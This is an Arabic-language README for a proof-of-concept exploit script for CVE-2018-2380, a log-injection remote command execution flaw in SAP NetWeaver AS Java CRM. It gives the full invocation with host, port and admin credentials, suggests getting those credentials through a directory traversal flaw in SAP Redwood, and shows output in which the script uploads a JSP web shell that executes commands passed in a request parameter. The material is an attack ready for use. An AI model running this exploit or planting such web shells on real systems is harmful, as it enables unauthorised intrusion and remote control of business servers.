
PoC لتنفيذ الأوامر عن بُعد عبر حقن السجلات على SAP NetWeaver AS JAVA CRM
إثبات المفهوم (PoC) لتنفيذ الأوامر عن بُعد عبر حقن السجلات على SAP NetWeaver AS JAVA CRM مثال على استخدام السكربت
python crm_rce-CVE-2018-2380.py --host 127.0.0.1 --port 50001 --username administrator --password 123QWEasd --SID DM0 --ssl true
حيث: --host هو عنوان IP لخادم SAP --port هو منفذ SAP NetWeaver AS Java اسم المستخدم وكلمة المرور لمسؤول SAP يمكنك الحصول عليهما باستخدام ثغرة اجتياز الدليل في SAP Redwood.
مثال على مخرجات استخدام السكربت
C:\exploits\SAP>crm_rce-CVE-2018-2380.py --host 127.0.0.1 --port 50001 --username administrator --password 123QWEasd --SID DM0 --ssl true
_______ _______ _______ _______ _______ _______ _
( ____ \( ____ )( ____ )( ____ \( ____ \( ___ )( ( /|
| ( \/| ( )|| ( )|| ( \/| ( \/| ( ) || \ ( |
| (__ | (____)|| (____)|| (_____ | | | (___) || \ | |
| __) | __)| _____)(_____ )| | | ___ || (\ \) |
| ( | (\ ( | ( ) || | | ( ) || | \ |
| (____/\| ) \ \__| ) /\____) || (____/\| ) ( || ) \ |
(_______/|/ \__/|/ \_______)(_______/|/ \||/ )_)
Vahagn @vah_13 Vardanian
Bob @NewFranny
Mathieu @gelim
CVE-2018-2380
[!] Try to get RCE using log injection
[!] Get j_salt token for requests
[!] Login to the SAP portal
[!] Change log path
[!] Upload "Runtime.getRuntime().exec(request.getParameter("cmd")) " shell to https://127.0.0.1:50001/ERPScan_shell_31275.0.jsp?cmd=ipconfig
[!] Restore logs path to ./default_log_name.log
[!] Enjoy!
C:\exploits\SAP>